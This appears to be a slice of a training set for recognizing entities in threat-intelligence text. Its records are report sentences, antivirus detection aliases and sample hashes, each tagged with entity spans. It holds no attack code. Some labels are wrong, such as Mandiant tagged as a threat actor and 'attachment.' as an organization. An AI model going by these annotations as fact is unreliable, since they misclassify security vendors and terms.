{"text": "Hashes of samples Type Package name SHA256 digest Custom ads com.targetshoot.zombieapocalypse.sniper.zombieshootinggame 5d98d8a7a012a858f0fa4cf8d2ed3d5a82937b1a98ea2703d440307c63c6c928 Click fraud com.counterterrorist.cs.elite.combat.shootinggame 84672fb2f228ec749d3c3c1cb168a1c31f544970fd29136bea2a5b2cefac6d04 Rooting trojan com.android.world.news bd233c1f5c477b0cc15d7f84392dab3a7a598243efa3154304327ff4580ae213 Zen trojan com.lmt.register eb12cd65589cbc6f9d3563576c304273cb6a78072b0c20a155a0951370476d8d Mobile Campaign ‘ Bouncing Golf ’ Affects Middle East We uncovered a cyberespionage campaign targeting Middle Eastern countries .", "spans": {"MALWARE: Zen": [[415, 418]], "MALWARE: Bouncing Golf": [[526, 539]]}, "info": {"id": "cyner2_train_000408", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Win32.Trojan.Kolweb.a.2.Pack Trojan/Delf.cf W32/Trojan.ORX Trojan.Kolweb.A W32/Startpage.AHU Win32/Startpage.LM TROJ_DOWNLOAD.E Trojan.Win32.Kolweb.a Trojan.Win32.Kolweb.A!IK TrojWare.Win32.Kolweb.A Trojan.DownLoader.1317 TROJ_DOWNLOAD.E Trojan/PSW.Almat.coi Adware:Win32/Adtomi.B Win-Spyware/Xema.171008 W32/Trojan.ORX Trojan.Win32.Kolweb.a Win32/Kolweb.A Trojan.Win32.Kolweb.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000411", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Crypt.ES Trojan.Crypt.ES Win32.Trojan.WisdomEyes.16070401.9500.9996 Trojan.Crypt.ES Trojan.Win32.Crypt.ewgrry Trojan.Crypt.ES Trojan.Crypt.ES BehavesLike.Win32.BadFile.lm Backdoor:Win32/Huceqoo.A Trojan.Win32.Z.Crypt.73728.BQ Trojan/Win32.Scar.C8074 Trojan.Crypt.ES BScope.Trojan.Dropper.we Trj/GdSda.A Trojan.Crypt.ES Win32/Trojan.b63", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000412", "source": "cyner2_train"}}
{"text": "However, this also leaves the C C traffic open for monitoring by others, including security researchers.", "spans": {"ORGANIZATION: security researchers.": [[83, 104]]}, "info": {"id": "cyner2_train_000414", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Pws.Watcher.A Trojan-PSW.Win32.Watcher!O Trojan.Pws.Watcher.A Trojan.Pws.Watcher.A Trojan.Pws.Watcher.A Trojan.Win32.Watcher.ejkr Trojan.Win32.A.PSW-Watcher.492035 Troj.PSW32.W.Watcher.a!c Trojan.Pws.Watcher.A Trojan.Pws.Watcher.A Trojan.PWS.Watcher Trojan.Watcher.Win32.8 Trojan-PWS.Win32.Watcher.i Trojan/PSW.Watcher.a TR/PSW.Watcher.B PWS:Win32/Watcher.A Trojan.Pws.Watcher.A TrojanPSW.Watcher Win32/PSW.Watcher.A Win32.Trojan-qqpass.Qqrob.Wqwh W32/PSWAtcher.A!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000415", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.PSW.Barok.10 Trojan/W32.Barok.1056825 Trojan.Win32.Barok.bcusy W32/Pws.ZDD WS.Reputation.1 Barok.1_0 TROJ_BAROK.10 Trojan.Spy-11230 Trojan-PSW.Win32.Barok.10 Trojan.PSW.Barok.10 Trojan.PWS.Barok!QhmYol9M94M TrojWare.Win32.PSW.Barok.10 Trojan.PSW.Barok.10 TR/Barok.PSW.10 TROJ_BAROK.10 Trojan/PSW.Barok.10 Win32.Troj.Barok.kcloud PWS:Win32/Barok.1_0 Trojan.Win32.Barok_10.Setup Trojan.PSW.Barok.10 W32/Pws.ZDD Win-Trojan/Barok.Client.v10 PSW.Barok.A Hack.PSWbarok.10 Trojan-PWS.Win32.Barok.10 W32/Barok.10!tr.pws Trj/PSW.Barok.10", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000419", "source": "cyner2_train"}}
{"text": "While the idea of malware as a service isn't a new one, with players such as Tox and Shark in the game, but it can be said that MacSpy is one of the first seen for the OS X platform.", "spans": {"MALWARE: malware": [[18, 25]], "THREAT_ACTOR: players": [[61, 68]], "MALWARE: Tox": [[77, 80]], "MALWARE: Shark": [[85, 90]], "MALWARE: MacSpy": [[128, 134]], "SYSTEM: OS X platform.": [[168, 182]]}, "info": {"id": "cyner2_train_000423", "source": "cyner2_train"}}
{"text": "A backdoor also known as: PUP.Optional.OpenCandy WS.Reputation.1 Trojan.DownLoader9.52502 TR/Dropper.A.23950 Win32.Troj.Undef.kcloud PE:PUF.OpenCandy!1.9DE5 Win32/Trojan.ca7", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000425", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.FamVT.Kykymber.P.Trojan Trojan.PWS.Onlinegames.KEGA Trojan-PWS.Win32.Kykymber.1!O PWS-OnlineGames.ke Trojan/PSW.Kykymber.kyz Win32.Trojan-PSW.OLGames.ay Infostealer.Gampass Win32/Gamepass.OQU Win.Spyware.79683-2 Trojan-PSW.Win32.Kykymber.kyz Trojan.PWS.Onlinegames.KEGA Trojan.Win32.OnLineGames.bkxdd Troj.PSW32.W.Kykymber.kyz!c Trojan.PSW.Win32.MiBao.a TrojWare.Win32.PSW.GamePass.A Trojan.PWS.Onlinegames.KEGA BehavesLike.Win32.PWSOnlineGames.pm TR/PSW.Kykymber.CD Trojan.Win32.A.PSW-Kykymber.43452[UPX] Trojan-PSW.Win32.Kykymber.kyz Trojan.PWS.Onlinegames.KEGA Trojan.PWS.Onlinegames.KEGA Win32/PSW.OnLineGames.QLR Trojan.PWS.Kykymber!KKmGLDbdY4I W32/OnLineGames.KY!tr.pws Trj/Kykymber.A Trojan.PSW.Win32.GameOnline.CP", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000426", "source": "cyner2_train"}}
{"text": "Recently, in our never-ending quest to protect the world from malware, we found a misbehaving Android trojan.", "spans": {"MALWARE: malware,": [[62, 70]], "MALWARE: Android trojan.": [[94, 109]]}, "info": {"id": "cyner2_train_000427", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Backdoor:Win32/Binanen.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000428", "source": "cyner2_train"}}
{"text": "The stolen parameters follow : ID IMSI IMEI Phone number Operator AID Model Brand Version Build Battery percentage Wi-Fi connection state Wake time Are logs enabled ? Is the malware already set as the default SMS application ? [ True/False ] Signal strength Screen active [ True/False ] Orientation Was accessibility permission granted ? [ True/False ] Screen size List of the installed applications SMS messages saved on the device It is not uncommon for banking malware to harvest extensive amounts of data from the victim ’ s device .", "spans": {}, "info": {"id": "cyner2_train_000429", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.Clod912.Trojan.1f28 Win32.Trojan.WisdomEyes.16070401.9500.9823 Trojan.Munidub TROJ64_ASRUEX.A Trojan.Win64.MLW.eelpql TROJ64_ASRUEX.A BehavesLike.Win64.CrossRider.tm W64/Trojan.MCVO-8253 Trojan/Win32.Zapchast Trojan:Win64/Asruex.A!dha Trojan.Zapchast.pk Trj/CI.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000431", "source": "cyner2_train"}}
{"text": "POS malware refers to malicious software that extracts payment card information from memory and usually uploads that data to a command and control CnC server.", "spans": {"MALWARE: POS malware": [[0, 11]], "MALWARE: malicious software": [[22, 40]], "VULNERABILITY: memory": [[85, 91]]}, "info": {"id": "cyner2_train_000432", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Graftor.DD2BF Trojan.DownLoader.18943 BehavesLike.Win32.Msposer.nm Trj/Lozyt.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000434", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Ransom.ANU Trojan.Enrume Ransom_Enrume.R00EC0DKG17 Trojan.Ransom.ANU Trojan.Ransom.ANU Trojan.Win32.Z.Ransom.6967658 Troj.Ransom.Anu!c Trojan.Ransom.ANU Trojan.Ransom.ANU Ransom_Enrume.R00EC0DKG17 BehavesLike.Win32.PUPXBC.vc TR/FileCoder.jtxjg Trojan.Ransom.ANU Trojan.Ransom.ANU Trj/CI.A Win32/Trojan.Ransom.2a7", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000435", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.SapinH.Trojan Trojan-Dropper.Win32.Injector!O Trojan.Mauvaise.SL1 Trojan.Chad Trojan.Packed.Win32.29983 Trojan.Application.Symmi.D73F9 Win32/Gamepass.HKIaME Trojan-Dropper.Win32.Injector.palw Trojan.Win32.KillProc.brmetk Troj.Dropper.W32.Injector.toQt Adware.Win32.Dropper.aaa Application.Win32.Kuaiba.BC Trojan.KillProc.22109 BehavesLike.Win32.VirRansom.fh TrojanDropper.Injector.ayai Trojan:Win32/Scoreem.A Trojan-Dropper.Win32.Injector.palw Dropper/Win32.Injector.R68328 TrojanDropper.Injector Trojan.DR.Injector!UEnRNWldneo Trojan.Win32.Senta W32/Injector.RREW!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000436", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.SumanyaQZA.Worm Worm.AutoRun W32/Autorun.worm.j Worm.AutoRun.Win32.2713 TROJ_FAM_0001c56.TOMA Win32.Worm.AutoRun.d W32.SillyDC Win32/SillyFDC.CD TROJ_FAM_0001c56.TOMA Worm.Win32.AutoRun.beh Trojan.Win32.AutoRun.uvsfh Worm.Win32.Autorun.204800 Trojan.Copier.8 BehavesLike.Win32.VBObfus.dm Worm.Win32.VB Worm/AutoRun.ahnn Worm:Win32/Manyasu.A Worm/Win32.AutoRun Worm:Win32/Manyasu.A Trojan.Heur.E08BA4 Worm.Win32.AutoRun.beh Worm/Win32.AutoRun.R18800 Trojan.VBO.012000 Trj/Manyasu.A Win32/AutoRun.VB.IY Trojan.Win32.VB.mct Worm.AutoRun!WxdQD2QNztM", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000437", "source": "cyner2_train"}}
{"text": "The ongoing attacks attempt to circumvent the extra protections conferred by two-factor authentication in Gmail, and rely heavily on phone-call based phishing and real time login attempts by the attackers.", "spans": {"THREAT_ACTOR: attackers.": [[195, 205]]}, "info": {"id": "cyner2_train_000438", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Backdoor.Win32.Stub!O Backdoor/Stub.j Win32.Worm.Delf.a Backdoor.Trojan Win32/Bosbot.D BKDR_STUB.G Backdoor.Win32.Stub.j Trojan.Win32.Stub.bbeaok Backdoor.Win32.A.Stub.114843[UPX] BackDoor.Stfu Backdoor.Stub.Win32.24 BKDR_STUB.G BehavesLike.Win32.Backdoor.cm Virus.Win32.Imponex Backdoor/Stub.n W32/Sality.Patched Trojan/Win32.Unknown Backdoor:Win32/Stub.P W32.W.Bagle.kZt7 Backdoor.Win32.Stub.j Win32.Worm.Imponex.A Trojan/Win32.Stub.C408823 BScope.Malware-Cryptor.Hlux W32/DelpDldr.A!tr.bdr W32/Knase.C", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000439", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9999 Trojan.Java.Adwind.dkmdei Java.Adwind.2 Trojan.Java.Adwind Trojan.Java.o JAVA/RemoteAd.dld Trojan:Java/Adwind.G Trj/CI.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000440", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Patched.FR Win32.Trojan.WisdomEyes.16070401.9500.9999 Backdoor.Sheedash Win32/Sfcpatched.A TROJ_PATCH.SMLD Win.Trojan.Sfcpatch-10 Trojan.Win32.Patched.fr Trojan.Win32.Patched.cwsyqv W32.W.AutoRun.kYRk Trojan.WinSpy.921 Trojan.Patched.Win32.27797 TROJ_PATCH.SMLD Trojan.Win32.Patched Trojan/Win32.Patched Trojan.Patched.1 Trojan.Win32.Patched.fr Trojan:Win32/Parchood.A Trojan/Win32.Patched.R3621 BScope.Trojan.Crex Trojan.Win32.Patched.f Trojan.Patched!j5lr5VQfEwA Win32/Trojan.2c9", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000443", "source": "cyner2_train"}}
{"text": "The group has been operating since 2012 and became particularly active in Q2 2015.", "spans": {"THREAT_ACTOR: The group": [[0, 9]]}, "info": {"id": "cyner2_train_000444", "source": "cyner2_train"}}
{"text": "SpyNote is similar to OmniRat and DroidJack, which are RATs remote administration tools that allow malware owners to gain remote administrative control of an Android device.", "spans": {"MALWARE: SpyNote": [[0, 7]], "MALWARE: OmniRat": [[22, 29]], "MALWARE: DroidJack,": [[34, 44]], "MALWARE: RATs remote administration tools": [[55, 87]], "THREAT_ACTOR: malware owners": [[99, 113]], "SYSTEM: Android device.": [[158, 173]]}, "info": {"id": "cyner2_train_000445", "source": "cyner2_train"}}
{"text": "As predicted following the leak of Hacking Team exploit codes covered here, the Zscaler security research team has recently started seeing a Chinese cyber espionage group weaponizing malware payloads using the 0-day exploits found in the leaked Hacking Team archives.", "spans": {"ORGANIZATION: Hacking Team": [[35, 47], [245, 257]], "MALWARE: exploit codes": [[48, 61]], "ORGANIZATION: Zscaler security research team": [[80, 110]], "THREAT_ACTOR: Chinese cyber espionage group": [[141, 170]], "MALWARE: malware payloads": [[183, 199]], "MALWARE: 0-day exploits": [[210, 224]]}, "info": {"id": "cyner2_train_000446", "source": "cyner2_train"}}
{"text": "The World Anti-Doping Agency WADA has alerted their stakeholders that email phishing scams are being reported in connection with WADA and therefore asks its recipients to be careful.", "spans": {"ORGANIZATION: The World Anti-Doping Agency WADA": [[0, 33]], "ORGANIZATION: WADA": [[129, 133]], "ORGANIZATION: recipients": [[157, 167]]}, "info": {"id": "cyner2_train_000447", "source": "cyner2_train"}}
{"text": "Attackers create accounts on those services and post encoded IP addresses or the domain names of real C2 servers in advance of distributing the backdoor.", "spans": {"THREAT_ACTOR: Attackers": [[0, 9]], "MALWARE: backdoor.": [[144, 153]]}, "info": {"id": "cyner2_train_000448", "source": "cyner2_train"}}
{"text": "A backdoor also known as: P2P-Worm.Win32.Delf!O Worm.Delf.9767 W32/Delf.ao WORM_YOOHOO.D Win32.Worm.Delf.a W32/SillyP2P.BR W32.HLLW.Yoohoo WORM_YOOHOO.D Win.Trojan.Delf-1033 P2P-Worm.Win32.Delf.ao Trojan.Win32.Delf.bojqna Win32.Worm-p2p.Delf.Lnfa Win32.HLLW.Woofka Worm.Delf.Win32.191 BehavesLike.Win32.Backdoor.ch Worm/Delf.ot Worm[P2P]/Win32.Delf Worm.Win32.A.P2P-Delf.70675[UPX] P2P-Worm.Win32.Delf.ao Win32/P2PDelf.worm.45056 Worm.Delf Win32/Delf.AO Worm.P2P.Delf.AAF!AU P2P-Worm.Win32.Delf W32/Delf.AO!worm.p2p W32/Spybot.TN.worm", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000451", "source": "cyner2_train"}}
{"text": "In February 2017, we observed an evolution of the Infy malware that we're calling Foudre lightning in French.", "spans": {"MALWARE: Infy malware": [[50, 62]], "MALWARE: Foudre": [[82, 88]]}, "info": {"id": "cyner2_train_000453", "source": "cyner2_train"}}
{"text": "IOC's related to a new version of Citadel that hit the streets on November 2015", "spans": {"MALWARE: Citadel": [[34, 41]]}, "info": {"id": "cyner2_train_000455", "source": "cyner2_train"}}
{"text": "In July 2015, Check Point's Incident Response team was contacted by a customer after they noticed strange file system activities in one of their Linux-based DNS BIND servers.", "spans": {"ORGANIZATION: Check Point's Incident Response team": [[14, 50]], "SYSTEM: Linux-based DNS BIND servers.": [[145, 174]]}, "info": {"id": "cyner2_train_000457", "source": "cyner2_train"}}
{"text": "This new version CryptoWall includes multiple updates, such as a more streamlined network communication channel, modified ransom message, and the encryption of filenames.", "spans": {"MALWARE: CryptoWall": [[17, 27]]}, "info": {"id": "cyner2_train_000458", "source": "cyner2_train"}}
{"text": "They can also be installed by other malware, or by exploiting software vulnerabilities.", "spans": {"MALWARE: malware,": [[36, 44]], "VULNERABILITY: exploiting software vulnerabilities.": [[51, 87]]}, "info": {"id": "cyner2_train_000459", "source": "cyner2_train"}}
{"text": "A backdoor also known as: BackdoorAPT.Hikit.MD6 BKDR64_GOALMAY.SM BKDR64_GOALMAY.SM Win.Trojan.HiKit-41 Trojan.Hikit.Win64.4 BehavesLike.Win64.PdfCrypt.cc Trojan.Dropper Backdoor:Win64/Hikiti.N!dha Trojan/Win32.HDC.C1382826 Trj/CI.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000461", "source": "cyner2_train"}}
{"text": "These attacks occurred in several different countries, but our investigation revealed that the primary targets were individuals and organizations primarily located in India.", "spans": {"ORGANIZATION: primary targets": [[95, 110]], "ORGANIZATION: individuals": [[116, 127]], "ORGANIZATION: organizations": [[132, 145]]}, "info": {"id": "cyner2_train_000462", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.FamVT.ExpiroPC.PE Trojan.Win32.ServStart.exsakp Trojan.Win32.Z.Servstart.15876.A Trojan.DownLoader9.26576 Trojan.Win32.Rozena TR/ServStart.dplva TrojanDownloader:Win32/Yemrok.A W32/Parite.dam W32/ServStart.DV!tr Win32/Trojan.849", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000463", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32/VB.l Trojan.Heur.EC3E8C WORM_ZAKA.AD W32/VB.UQEY-1535 W32.HLLW.Asterz.intd WORM_ZAKA.AD Win.Worm.VB-29 P2P-Worm.Win32.VB.l Trojan.Win32.VB.hxbs Worm.Win32.P2P-VB.24576.D W32.W.VB.l!c Win32.VB.L Win32.HLLW.Kirk.24576 Worm.VB.Win32.51 BehavesLike.Win32.Virus.mz Trojan-Banker.Win32.Bancos W32/VB.KA@p2p Worm/VB.qvg Worm:Win32/Icasur.Q WORM/VB.A Worm[P2P]/Win32.VB Worm.P2PVB.a.kcloud Worm:Win32/Icasur.Q P2P-Worm.Win32.VB.l Worm.VB Win32/VB.L Win32.Virus.Vb.Lkdy Worm.P2P.Zaka.R W32/VB.L!worm.p2p", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000464", "source": "cyner2_train"}}
{"text": "Throughout 2015, Symantec.cloud has been detecting a stream of emails that have the Xtreme remote access Trojan RAT, which we detect as W32.Extrat, as an attachment.", "spans": {"ORGANIZATION: Symantec.cloud": [[17, 31]], "MALWARE: Xtreme remote access Trojan RAT,": [[84, 116]], "ORGANIZATION: attachment.": [[154, 165]]}, "info": {"id": "cyner2_train_000465", "source": "cyner2_train"}}
{"text": "In November 2016, we observed the reemergence of destructive attacks associated with the 2012 Shamoon attack campaign.", "spans": {"THREAT_ACTOR: Shamoon attack campaign.": [[94, 118]]}, "info": {"id": "cyner2_train_000466", "source": "cyner2_train"}}
{"text": "This malware masquerades as typical ransomware: it encrypts the data on the computer and demands $300 bitcoins for recovery.", "spans": {"MALWARE: malware": [[5, 12]], "MALWARE: ransomware:": [[36, 47]], "SYSTEM: computer": [[76, 84]]}, "info": {"id": "cyner2_train_000467", "source": "cyner2_train"}}
{"text": "TREASUREHUNT enumerates running processes, extracts payment card information from memory, and then transmits this information to a command and control server.", "spans": {"MALWARE: TREASUREHUNT": [[0, 12]]}, "info": {"id": "cyner2_train_000468", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Backdoor.Androm Win32.Trojan.WisdomEyes.16070401.9500.9998 W32/Trojan.CFAT-3750 Trojan.MulDrop7.39399 Backdoor.Androm.tas Trojan[Backdoor]/Win32.Androm Trojan:Win32/Lamooc.A Trojan/Win32.Androm.C2185535 Backdoor.Androm Trj/GdSda.A Backdoor.Androm!dAFAsy80jho", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000470", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan/Comfoo.a Backdoor.Vinself TROJ_COMFOO.AI Trojan.PWS.DPD.14 TROJ_COMFOO.AI Trojan[Dropper]/Win32.Injector Backdoor:Win32/Comfoo.C Win-Trojan/Comfoo.114688 Backdoor.Win32.Comfoo W32/PWS_y.AI!tr Win32/Trojan.3fc", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000473", "source": "cyner2_train"}}
{"text": "In October we saw an increase in infections.", "spans": {}, "info": {"id": "cyner2_train_000474", "source": "cyner2_train"}}
{"text": "TeslaCrypt/AlphaCrypt uses AES256 encryption.", "spans": {}, "info": {"id": "cyner2_train_000475", "source": "cyner2_train"}}
{"text": "The principles of this bootkit's work, named HDRoot, have been described in the first part of our article.", "spans": {"MALWARE: bootkit's": [[23, 32]]}, "info": {"id": "cyner2_train_000476", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Win32.Stepaik.A Worm.Stepaik Win32.Stepaik.A W32/Trojan.ILKV-7384 Win32.Stepaik.A Email-Worm.Win32.Stepaik.c Win32.Stepaik.A Email.Worm.W32!c Win32.Stepaik.A Win32.Stepaik.A Trojan.Inject3.836 BehavesLike.Win32.Virut.mh Worm[Email]/Win32.Stepaik Email-Worm.Win32.Stepaik.c Win32.Stepaik.A Trj/CI.A Win32.Worm-email.Stepaik.Day Worm.Win32.Stepar W32/Stepaik.C@mm Win32/Trojan.7ee", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000478", "source": "cyner2_train"}}
{"text": "We setup a system with weak and default passwords to capture any and all malware spread in this fashion.", "spans": {"SYSTEM: system": [[11, 17]], "MALWARE: malware": [[73, 80]]}, "info": {"id": "cyner2_train_000479", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.HfsAutoB.5B9D Packer.Malware.NSAnti.A Packer.Malware.NSAnti.A Trojan.MalPack.NSPack Trojan/PornoBlocker.afxh Win32.Trojan.WisdomEyes.16070401.9500.9998 Trojan.Packed.NsAnti Packer.Malware.NSAnti.A Packed.Win32.NSAnti.r Packer.Malware.NSAnti.A Trojan.Win32.NSAnti.fthc Packer.Malware.NSAnti.A BackDoor.Singu Packed.NSAnti.frd Packer.Malware.NSAnti.A Packed.Win32.NSAnti.r Trojan:Win32/Vanti.B.dll Trojan/Win32.Hupigon.C134220 TScope.Malware-Cryptor.SB Rootkit.Win32.Vanti.D", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000480", "source": "cyner2_train"}}
{"text": "The ransomware makes this connection presumably to report that your computer has been compromised.", "spans": {"MALWARE: ransomware": [[4, 14]], "SYSTEM: computer": [[68, 76]], "VULNERABILITY: compromised.": [[86, 98]]}, "info": {"id": "cyner2_train_000482", "source": "cyner2_train"}}
{"text": "This attack took advantage of a Java zero-day exploit and used hacked forums as watering holes.", "spans": {"SYSTEM: Java": [[32, 36]], "MALWARE: zero-day exploit": [[37, 53]]}, "info": {"id": "cyner2_train_000483", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.FamVT.QPassHV.Trojan Trojan.Zenshirsh.SL7 Trojan/QQPass.owd Win32.Trojan-PSW.QQPass.af Win32/Oflwr.A!crypt Trojan.Win32.Scar.oetk Trojan.Win32.DangerousObject.dnizrq Win32.Trojan.Scar.Wsts TrojWare.Win32.PWS.QQPass.AZF Trojan.DownLoader12.31656 Trojan.QQPass.Win32.24405 BehavesLike.Win32.Trojan.nc TR/PSW.QQSteal.boeu Trojan.Win32.Z.Qqpass.100934 Trojan.Scar Win32/PSW.QQPass.OWD Win32/Worm.Scar.B", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000484", "source": "cyner2_train"}}
{"text": "Throughout the year, Bankbot has been distributed as benign apps, some of which made their way onto popular app stores.", "spans": {"MALWARE: Bankbot": [[21, 28]], "SYSTEM: benign apps,": [[53, 65]], "SYSTEM: popular app stores.": [[100, 119]]}, "info": {"id": "cyner2_train_000485", "source": "cyner2_train"}}
{"text": "In June 2022, Mandiant Managed Defense detected and responded to an UNC2970 phishing campaign targeting a U.S.-based technology company.", "spans": {"THREAT_ACTOR: Mandiant": [[14, 22]], "ORGANIZATION: Defense": [[31, 38]], "THREAT_ACTOR: UNC2970 phishing campaign": [[68, 93]], "ORGANIZATION: a U.S.-based technology company.": [[104, 136]]}, "info": {"id": "cyner2_train_000486", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.NSIS.Androm.7 Ransom.Onion.A Win32.Trojan.Injector.je Packed.NSISPacker!g7 Win32/Injector.CXKV TROJ_GE.F5258674 Zum.Ransom.NSIS.Cerber.1 Trojan.NSIS.Androm.7 Trojan.Win32.CXKV.ecdllh Trojan.Kovter.118 BehavesLike.Win32.Ransom.dc Trojan.Win32.Injector Trojan/Win32.Injector.cxkv Zum.Ransom.NSIS.Cerber.1 Trojan/Win32.Cerber.R180093 Trojan.Injector!M8gUkRYeGG8 W32/Injector.CXKV!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000489", "source": "cyner2_train"}}
{"text": "It appears the same actor developed both the Komplex and XAgentOSX tools, based on similarities within the following project paths found within the tools.", "spans": {"THREAT_ACTOR: actor": [[20, 25]], "MALWARE: Komplex": [[45, 52]], "MALWARE: XAgentOSX tools,": [[57, 73]], "MALWARE: tools.": [[148, 154]]}, "info": {"id": "cyner2_train_000490", "source": "cyner2_train"}}
{"text": "The construction of the webshell was interesting by itself, as it was actually two separate webshells: an initial webshell that was responsible for saving and loading the second fully functional webshell.", "spans": {"MALWARE: webshell": [[24, 32], [114, 122]], "MALWARE: webshells:": [[92, 102]], "MALWARE: webshell.": [[195, 204]]}, "info": {"id": "cyner2_train_000491", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Hacktool.Flystudio.16558 Trojan.DownLoader12.49203 Trojan-Downloader.Win32.Raykmerd Trojan/Badur.jao TR/Dldr.Raykmerd.amotd TrojanDownloader:Win32/Raykmerd.A Trojan.Badur", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000492", "source": "cyner2_train"}}
{"text": "On September 18, 2015, we saw an activity on koreatimes.com where we captured a malicious binary.", "spans": {"MALWARE: malicious binary.": [[80, 97]]}, "info": {"id": "cyner2_train_000493", "source": "cyner2_train"}}
{"text": "These innovations included two significant changes in Dyre behavior:", "spans": {"MALWARE: Dyre": [[54, 58]]}, "info": {"id": "cyner2_train_000498", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.FlameF.Worm Trojan.Flame.B Worm.Win32.Flame!O Worm.Flamea Worm.Win32.Flame.a Trojan/Flamer.a Win32.Trojan.WisdomEyes.16070401.9500.9790 W32/Flamer.A W32.Flamer Win32/Flame.A WORM_FLAMER.A Win.Worm.Flame-9 Trojan.Flame.B Worm.Win32.Flame.a Trojan.Flame.B Trojan.Win32.Flame.sbruw W32.W.Flame.a!c Win32.Worm.Flame.Wpjf Worm.Win32.Flame.a Trojan.Flame.B Win32.HLLW.Flame.1 Worm.Flame.Win32.3 WORM_FLAMER.A W32/Flamer.OWIT-2039 Worm/Flame.f W32.Worm.Flame TR/Flamer.A.1 Worm/Win32.Flame Trojan.Flame.B Worm.Win32.Flame.1721856 Worm.Win32.Flame.a Win-Trojan/Flamer.1721856 Worm.Flame Worm.Win32.Flame.a Trojan.Flame.B Win32/Flamer.A Trojan.Flame.A Worm.Win32.Flame W32/Flame.A!worm Trojan.Flame.3535 W32/Flamer.A.worm", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000499", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojandropper.Exebundle2X Worm.WBNA.Win32.421402 Win.Worm.Drefir-14 Trojan.Win32.ExeBundle.exrqtj Trojan.Win32.Z.Exebundle.8609956 Trojan.MulDrop.1611 W32/Trojan.EGST-2925 TR/ExeBundle.272 Trojan[Downloader]/Win32.Small TrojanDropper:Win32/ExeBundle_2x.A Trojan.MulDrop Trj/CI.A Trojan.Dropper W32/Multidr.FD!tr Win32/Trojan.852", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000501", "source": "cyner2_train"}}
{"text": "Our friends over at Bellingcat, which conducts open source investigations and writes extensively on Russia-related issues, recently shared a new tranche of spear-phishing emails they had received.", "spans": {"ORGANIZATION: Bellingcat,": [[20, 31]]}, "info": {"id": "cyner2_train_000503", "source": "cyner2_train"}}
{"text": "A backdoor also known as: TrojWare.Win32.ChePro.RHZ TrojanDownloader:Win32/Hormelex.B Trojan/Win32.ChePro Trojan.Win32.Delf.PQD", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000504", "source": "cyner2_train"}}
